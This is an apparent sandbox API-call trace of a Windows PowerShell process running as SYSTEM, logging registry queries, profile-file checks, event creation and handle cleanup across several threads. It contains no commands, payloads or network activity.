	[0089.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ddbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.688] GetLastError () returned 0xcb
	[0089.688] VirtualQuery (in: lpAddress=0x14d330, lpBuffer=0x14e330, dwLength=0x1c | out: lpBuffer=0x14e330*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.688] VirtualQuery (in: lpAddress=0x14cfe4, lpBuffer=0x14dfe4, dwLength=0x1c | out: lpBuffer=0x14dfe4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.688] VirtualQuery (in: lpAddress=0x14cfe4, lpBuffer=0x14dfe4, dwLength=0x1c | out: lpBuffer=0x14dfe4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.690] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea6c | out: phkResult=0x14ea6c*=0x320) returned 0x0
	[0089.690] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14eab4, lpData=0x0, lpcbData=0x14eab0*=0x0 | out: lpType=0x14eab4*=0x1, lpData=0x0, lpcbData=0x14eab0*=0x56) returned 0x0
	[0089.690] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14eab4, lpData=0x361778, lpcbData=0x14eab0*=0x56 | out: lpType=0x14eab4*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14eab0*=0x56) returned 0x0
	[0089.690] RegCloseKey (hKey=0x320) returned 0x0
	[0089.690] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea6c | out: phkResult=0x14ea6c*=0x320) returned 0x0
	[0089.690] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14eab4, lpData=0x0, lpcbData=0x14eab0*=0x0 | out: lpType=0x14eab4*=0x1, lpData=0x0, lpcbData=0x14eab0*=0x56) returned 0x0
	[0089.690] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14eab4, lpData=0x361778, lpcbData=0x14eab0*=0x56 | out: lpType=0x14eab4*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14eab0*=0x56) returned 0x0
	[0089.690] RegCloseKey (hKey=0x320) returned 0x0
	[0089.691] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x361778 | out: pszPath="") returned 0x80070002
	[0089.691] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x361778 | out: pszPath="") returned 0x80070002
	[0089.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0089.692] GetLastError () returned 0x3f0
	[0089.692] SetErrorMode (uMode=0x1) returned 0x1
	[0089.692] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14eb1c | out: lpFileInformation=0x14eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0089.692] GetLastError () returned 0x2
	[0089.692] SetErrorMode (uMode=0x1) returned 0x1
	[0089.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0089.692] GetLastError () returned 0x2
	[0089.692] SetErrorMode (uMode=0x1) returned 0x1
	[0089.692] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14eb1c | out: lpFileInformation=0x14eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0089.693] GetLastError () returned 0x2
	[0089.693] SetErrorMode (uMode=0x1) returned 0x1
	[0089.693] GetFullPathNameW (in: lpFileName="WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x31
	[0089.693] GetLastError () returned 0x2
	[0089.693] SetErrorMode (uMode=0x1) returned 0x1
	[0089.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14eb1c | out: lpFileInformation=0x14eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0089.693] GetLastError () returned 0x2
	[0089.693] SetErrorMode (uMode=0x1) returned 0x1
	[0089.693] GetFullPathNameW (in: lpFileName="WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x46
	[0089.693] GetLastError () returned 0x2
	[0089.693] SetErrorMode (uMode=0x1) returned 0x1
	[0089.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14eb1c | out: lpFileInformation=0x14eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0089.693] GetLastError () returned 0x2
	[0089.693] SetErrorMode (uMode=0x1) returned 0x1
	[0089.694] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.694] GetLastError () returned 0xcb
	[0089.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.695] GetLastError () returned 0xcb
	[0089.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.695] GetLastError () returned 0xcb
	[0089.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.695] GetLastError () returned 0xcb
	[0089.696] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.696] GetLastError () returned 0xcb
	[0089.696] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.696] GetLastError () returned 0xcb
	[0089.696] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x320
	[0089.696] GetLastError () returned 0x0
	[0089.696] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x324
	[0089.696] GetLastError () returned 0x0
	[0089.696] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0089.696] GetLastError () returned 0x0
	[0089.696] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0089.696] GetLastError () returned 0x0
	[0089.696] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0089.696] GetLastError () returned 0x0
	[0089.696] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0089.696] GetLastError () returned 0x0
	[0089.696] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x354
	[0089.697] GetLastError () returned 0x0
	[0089.697] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0089.697] GetLastError () returned 0x0
	[0089.697] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x33c
	[0089.697] GetLastError () returned 0x0
	[0089.697] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x340
	[0089.697] GetLastError () returned 0x0
	[0089.697] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x29c
	[0089.697] GetLastError () returned 0x0
	[0089.697] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2a0
	[0089.697] GetLastError () returned 0x0
	[0089.697] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.697] GetLastError () returned 0xcb
	[0089.698] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0089.698] GetLastError () returned 0xcb
	[0089.698] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x14eb5c | out: lpMode=0x14eb5c) returned 1
	[0089.698] GetLastError () returned 0xcb
	[0089.699] SetEvent (hEvent=0x32c) returned 1
	[0089.699] GetLastError () returned 0xcb
	[0089.699] SetEvent (hEvent=0x320) returned 1
	[0089.699] GetLastError () returned 0xcb
	[0089.699] SetEvent (hEvent=0x324) returned 1
	[0089.699] GetLastError () returned 0xcb
	[0089.699] SetEvent (hEvent=0x328) returned 1
	[0089.699] GetLastError () returned 0xcb
	[0089.699] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0089.699] GetLastError () returned 0x0
	[0089.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.699] GetLastError () returned 0xcb
	[0089.700] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9c0 | out: phkResult=0x14e9c0*=0x2c0) returned 0x0
	[0089.700] RegQueryValueExW (in: hKey=0x2c0, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14ea08, lpData=0x0, lpcbData=0x14ea04*=0x0 | out: lpType=0x14ea08*=0x0, lpData=0x0, lpcbData=0x14ea04*=0x0) returned 0x2
	[0090.739] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x300
	[0090.739] GetLastError () returned 0x0
	[0090.739] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x304
	[0090.739] GetLastError () returned 0x0
	[0090.739] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0090.739] GetLastError () returned 0x0
	[0090.739] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
	[0090.739] GetLastError () returned 0x0
	[0090.739] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x310
	[0090.739] GetLastError () returned 0x0
	[0090.739] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x314
	[0090.739] GetLastError () returned 0x0
	[0090.739] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0090.739] GetLastError () returned 0x0
	[0090.739] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0090.739] GetLastError () returned 0x0
	[0090.739] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x35c
	[0090.739] GetLastError () returned 0x0
	[0090.739] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x360
	[0090.739] GetLastError () returned 0x0
	[0090.739] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364
	[0090.740] GetLastError () returned 0x0
	[0090.740] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368
	[0090.740] GetLastError () returned 0x0
	[0090.740] SetEvent (hEvent=0x30c) returned 1
	[0090.740] GetLastError () returned 0x0
	[0090.740] SetEvent (hEvent=0x300) returned 1
	[0090.740] GetLastError () returned 0x0
	[0090.740] SetEvent (hEvent=0x304) returned 1
	[0090.740] GetLastError () returned 0x0
	[0090.740] SetEvent (hEvent=0x308) returned 1
	[0090.740] GetLastError () returned 0x0
	[0090.740] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0090.740] GetLastError () returned 0x0
	[0090.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9f4 | out: phkResult=0x14e9f4*=0x370) returned 0x0
	[0090.740] RegQueryValueExW (in: hKey=0x370, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14ea3c, lpData=0x0, lpcbData=0x14ea38*=0x0 | out: lpType=0x14ea3c*=0x0, lpData=0x0, lpcbData=0x14ea38*=0x0) returned 0x2
	[0090.776] SetEvent (hEvent=0x310) returned 1
	[0090.776] GetLastError () returned 0x0
	[0090.776] SetEvent (hEvent=0x314) returned 1
	[0090.776] GetLastError () returned 0x0
	[0090.776] SetEvent (hEvent=0x34c) returned 1
	[0090.776] GetLastError () returned 0x0
	[0090.784] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.784] GetLastError () returned 0xcb
	[0090.786] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x367d10, nSize=0x14ead0 | out: lpNameBuffer="WORKGROUP\\ZGW5TDPU$", nSize=0x14ead0) returned 0x1
	[0090.786] GetLastError () returned 0xcb
	[0090.786] GetUserNameW (in: lpBuffer=0x361778, pcbBuffer=0x14ead8 | out: lpBuffer="SYSTEM", pcbBuffer=0x14ead8) returned 1
	[0090.787] ReportEventW (hEventLog=0x35c0004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x19ac908*="Stopped", lpRawData=0x19ac7c4) returned 1
	[0090.787] GetLastError () returned 0x0
	[0090.787] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1
	[0090.787] GetLastError () returned 0x0
	[0090.788] CoGetContextToken (in: pToken=0x14f800 | out: pToken=0x14f800) returned 0x0
	[0090.788] CObjectContext::QueryInterface () returned 0x0
	[0090.789] CObjectContext::GetCurrentThreadType () returned 0x0
	[0090.789] Release () returned 0x0
	[0090.790] CoGetContextToken (in: pToken=0x14f5d8 | out: pToken=0x14f5d8) returned 0x0
	[0090.790] CObjectContext::QueryInterface () returned 0x0
	[0090.790] CObjectContext::GetCurrentThreadType () returned 0x0
	[0090.790] Release () returned 0x0
	[0090.792] CoGetContextToken (in: pToken=0x14f5d8 | out: pToken=0x14f5d8) returned 0x0
	[0090.792] CObjectContext::QueryInterface () returned 0x0
	[0090.792] CObjectContext::GetCurrentThreadType () returned 0x0
	[0090.792] Release () returned 0x0
	[0090.825] CoGetContextToken (in: pToken=0x14f5d8 | out: pToken=0x14f5d8) returned 0x0
	[0090.825] CObjectContext::QueryInterface () returned 0x0
	[0090.825] CObjectContext::GetCurrentThreadType () returned 0x0
	[0090.825] Release () returned 0x0
	[0090.826] CoGetContextToken (in: pToken=0x14f5b8 | out: pToken=0x14f5b8) returned 0x0
	[0090.826] CObjectContext::QueryInterface () returned 0x0
	[0090.826] CObjectContext::GetCurrentThreadType () returned 0x0
	[0090.826] Release () returned 0x0
	[0090.827] CoUninitialize () 

Thread:
	id = 144
	os_tid = 0x9b0


Thread:
	id = 145
	os_tid = 0x9ac


Thread:
	id = 146
	os_tid = 0x668


Thread:
	id = 147
	os_tid = 0x9cc


Thread:
	id = 148
	os_tid = 0x9d4

	[0086.404] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0088.609] LocalFree (hMem=0x3674f0) returned 0x0
	[0088.609] GetLastError () returned 0x0
	[0088.609] CloseHandle (hObject=0x2c0) returned 1
	[0088.609] GetLastError () returned 0x0
	[0088.609] CloseHandle (hObject=0x13) returned 1
	[0088.609] GetLastError () returned 0x0
	[0088.610] CloseHandle (hObject=0xf) returned 1
	[0088.610] GetLastError () returned 0x0
	[0088.610] RegCloseKey (hKey=0x2a4) returned 0x0
	[0088.610] RegCloseKey (hKey=0x2a0) returned 0x0
	[0088.610] RegCloseKey (hKey=0x29c) returned 0x0
	[0088.610] LocalFree (hMem=0x367510) returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] RegCloseKey (hKey=0x2cc) returned 0x0
	[0089.373] RegCloseKey (hKey=0x34c) returned 0x0
	[0089.373] RegCloseKey (hKey=0x314) returned 0x0
	[0089.374] RegCloseKey (hKey=0x310) returned 0x0
	[0089.374] RegCloseKey (hKey=0x30c) returned 0x0
	[0089.374] RegCloseKey (hKey=0x308) returned 0x0
	[0089.374] RegCloseKey (hKey=0x304) returned 0x0
	[0089.374] RegCloseKey (hKey=0x300) returned 0x0
	[0089.374] RegCloseKey (hKey=0x2fc) returned 0x0
	[0089.374] RegCloseKey (hKey=0x2f8) returned 0x0
	[0089.375] RegCloseKey (hKey=0x348) returned 0x0
	[0089.375] RegCloseKey (hKey=0x2e8) returned 0x0
	[0089.375] RegCloseKey (hKey=0x2e4) returned 0x0
	[0089.375] RegCloseKey (hKey=0x2e0) returned 0x0
	[0089.375] RegCloseKey (hKey=0x2dc) returned 0x0
	[0089.375] RegCloseKey (hKey=0x2d8) returned 0x0
	[0089.376] RegCloseKey (hKey=0x2d4) returned 0x0
	[0089.376] RegCloseKey (hKey=0x2d0) returned 0x0
	[0089.376] RegCloseKey (hKey=0x2c0) returned 0x0
	[0089.376] RegCloseKey (hKey=0x344) returned 0x0
	[0089.376] RegCloseKey (hKey=0x2a0) returned 0x0
	[0089.376] RegCloseKey (hKey=0x29c) returned 0x0
	[0089.376] RegCloseKey (hKey=0x340) returned 0x0
	[0089.377] RegCloseKey (hKey=0x33c) returned 0x0
	[0089.377] RegCloseKey (hKey=0x318) returned 0x0
	[0089.377] RegCloseKey (hKey=0x354) returned 0x0
	[0089.377] RegCloseKey (hKey=0x334) returned 0x0
	[0089.377] RegCloseKey (hKey=0x330) returned 0x0
	[0089.377] RegCloseKey (hKey=0x32c) returned 0x0
	[0089.377] RegCloseKey (hKey=0x328) returned 0x0
	[0089.378] RegCloseKey (hKey=0x324) returned 0x0
	[0089.378] RegCloseKey (hKey=0x320) returned 0x0
	[0089.378] RegCloseKey (hKey=0x31c) returned 0x0
	[0089.378] RegCloseKey (hKey=0x2f4) returned 0x0
	[0089.378] RegCloseKey (hKey=0x350) returned 0x0
	[0089.378] RegCloseKey (hKey=0x2cc) returned 0x0
	[0090.791] GetLastError () returned 0x0
	[0090.791] GetLastError () returned 0x0
	[0090.791] LocalFree (hMem=0x352108) returned 0x0
	[0090.791] GetLastError () returned 0x0
	[0090.792] GetLastError () returned 0x0
	[0090.792] GetLastError () returned 0x0
	[0090.792] LocalFree (hMem=0x352080) returned 0x0
	[0090.792] GetLastError () returned 0x0
	[0090.799] DeregisterEventSource (hEventLog=0x35c0004) returned 1
	[0090.799] GetLastError () returned 0x0
	[0090.808] CloseHandle (hObject=0x35c) returned 1
	[0090.808] GetLastError () returned 0x0
	[0090.809] CloseHandle (hObject=0x338) returned 1
	[0090.809] GetLastError () returned 0x0
	[0090.809] CloseHandle (hObject=0x34c) returned 1
	[0090.809] GetLastError () returned 0x0
	[0090.809] CloseHandle (hObject=0x314) returned 1
	[0090.809] GetLastError () returned 0x0
	[0090.809] CloseHandle (hObject=0x310) returned 1
	[0090.809] GetLastError () returned 0x0
	[0090.809] CloseHandle (hObject=0x30c) returned 1
	[0090.809] GetLastError () returned 0x0
	[0090.810] CloseHandle (hObject=0x308) returned 1
	[0090.810] GetLastError () returned 0x0
	[0090.810] CloseHandle (hObject=0x304) returned 1
	[0090.810] GetLastError () returned 0x0
	[0090.810] CloseHandle (hObject=0x300) returned 1
	[0090.810] GetLastError () returned 0x0
	[0090.810] CloseHandle (hObject=0xf) returned 1
	[0090.810] GetLastError () returned 0x0
	[0090.810] CloseHandle (hObject=0x7f) returned 1
	[0090.811] GetLastError () returned 0x0
	[0090.811] CloseHandle (hObject=0x7b) returned 1
	[0090.811] GetLastError () returned 0x0
	[0090.811] CloseHandle (hObject=0x77) returned 1
	[0090.811] GetLastError () returned 0x0
	[0090.811] CloseHandle (hObject=0x73) returned 1
	[0090.811] GetLastError () returned 0x0
	[0090.812] CloseHandle (hObject=0x6f) returned 1
	[0090.812] GetLastError () returned 0x0
	[0090.812] CloseHandle (hObject=0x6b) returned 1
	[0090.812] GetLastError () returned 0x0
	[0090.812] CloseHandle (hObject=0x67) returned 1
	[0090.812] GetLastError () returned 0x0
	[0090.813] CloseHandle (hObject=0x63) returned 1
	[0090.813] GetLastError () returned 0x0
	[0090.813] CloseHandle (hObject=0x5f) returned 1
	[0090.813] GetLastError () returned 0x0
	[0090.813] CloseHandle (hObject=0x5b) returned 1
	[0090.813] GetLastError () returned 0x0
	[0090.813] CloseHandle (hObject=0x57) returned 1
	[0090.814] GetLastError () returned 0x0
	[0090.814] CloseHandle (hObject=0x53) returned 1
	[0090.814] GetLastError () returned 0x0
	[0090.814] CloseHandle (hObject=0x4f) returned 1
	[0090.814] GetLastError () returned 0x0
	[0090.814] CloseHandle (hObject=0x4b) returned 1
	[0090.815] GetLastError () returned 0x0
	[0090.815] CloseHandle (hObject=0x47) returned 1
	[0090.815] GetLastError () returned 0x0
	[0090.815] CloseHandle (hObject=0x43) returned 1
	[0090.815] GetLastError () returned 0x0
	[0090.815] RegCloseKey (hKey=0x2c0) returned 0x0
	[0090.816] CloseHandle (hObject=0x344) returned 1
	[0090.816] GetLastError () returned 0x0
	[0090.816] CloseHandle (hObject=0x2a0) returned 1
	[0090.816] GetLastError () returned 0x0
	[0090.816] CloseHandle (hObject=0x29c) returned 1
	[0090.816] GetLastError () returned 0x0
	[0090.816] CloseHandle (hObject=0x340) returned 1
	[0090.816] GetLastError () returned 0x0
	[0090.816] CloseHandle (hObject=0x33c) returned 1
	[0090.816] GetLastError () returned 0x0
	[0090.816] CloseHandle (hObject=0x318) returned 1
	[0090.816] GetLastError () returned 0x0
	[0090.817] CloseHandle (hObject=0x354) returned 1
	[0090.817] GetLastError () returned 0x0
	[0090.817] CloseHandle (hObject=0x334) returned 1
	[0090.817] GetLastError () returned 0x0
	[0090.817] CloseHandle (hObject=0x330) returned 1
	[0090.817] GetLastError () returned 0x0
	[0090.817] CloseHandle (hObject=0x32c) returned 1
	[0090.817] GetLastError () returned 0x0
	[0090.817] CloseHandle (hObject=0x328) returned 1
	[0090.817] GetLastError () returned 0x0
	[0090.818] CloseHandle (hObject=0x324) returned 1
	[0090.818] GetLastError () returned 0x0
	[0090.818] CloseHandle (hObject=0x320) returned 1
	[0090.818] GetLastError () returned 0x0
	[0090.818] CloseHandle (hObject=0x3f) returned 1
	[0090.818] GetLastError () returned 0x0
	[0090.818] CloseHandle (hObject=0x3b) returned 1
	[0090.818] GetLastError () returned 0x0
	[0090.818] CloseHandle (hObject=0x37) returned 1
	[0090.819] GetLastError () returned 0x0
	[0090.819] CloseHandle (hObject=0x33) returned 1
	[0090.819] GetLastError () returned 0x0
	[0090.819] CloseHandle (hObject=0x2f) returned 1
	[0090.819] GetLastError () returned 0x0
	[0090.819] CloseHandle (hObject=0x2b) returned 1
	[0090.820] GetLastError () returned 0x0
	[0090.820] CloseHandle (hObject=0x27) returned 1
	[0090.820] GetLastError () returned 0x0
	[0090.820] CloseHandle (hObject=0x23) returned 1
	[0090.820] GetLastError () returned 0x0
	[0090.820] CloseHandle (hObject=0x1f) returned 1
	[0090.821] GetLastError () returned 0x0
	[0090.821] CloseHandle (hObject=0x1b) returned 1
	[0090.821] GetLastError () returned 0x0
	[0090.821] CloseHandle (hObject=0x17) returned 1
	[0090.821] GetLastError () returned 0x0
	[0090.821] CloseHandle (hObject=0x13) returned 1
	[0090.822] GetLastError () returned 0x0
	[0090.822] CloseHandle (hObject=0x2b8) returned 1
	[0090.822] GetLastError () returned 0x0
	[0090.822] RegCloseKey (hKey=0x370) returned 0x0
	[0090.822] UnmapViewOfFile (lpBaseAddress=0x700000) returned 1
	[0090.823] CloseHandle (hObject=0x2c8) returned 1
	[0090.823] GetLastError () returned 0x0
	[0090.823] RegCloseKey (hKey=0x80000004) returned 0x0
	[0090.823] CloseHandle (hObject=0x36c) returned 1
	[0090.823] GetLastError () returned 0x0
	[0090.823] CloseHandle (hObject=0x284) returned 1
	[0090.823] GetLastError () returned 0x0
	[0090.824] CloseHandle (hObject=0x368) returned 1
	[0090.824] GetLastError () returned 0x0
	[0090.824] CloseHandle (hObject=0x364) returned 1
	[0090.824] GetLastError () returned 0x0
	[0090.824] CloseHandle (hObject=0x360) returned 1
	[0090.824] GetLastError () returned 0x0

Thread:
	id = 149
	os_tid = 0x9e0

	[0089.703] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0089.734] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0089.740] VirtualQuery (in: lpAddress=0x43ae0a0, lpBuffer=0x43af0a0, dwLength=0x1c | out: lpBuffer=0x43af0a0*(BaseAddress=0x43ae000, AllocationBase=0x3a20000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.743] GetLastError () returned 0xcb
	[0089.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.745] GetLastError () returned 0xcb
	[0089.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.747] GetLastError () returned 0xcb
	[0089.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.758] GetLastError () returned 0xcb
	[0089.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.759] GetLastError () returned 0xcb
	[0089.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b16e8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.760] GetLastError () returned 0xcb
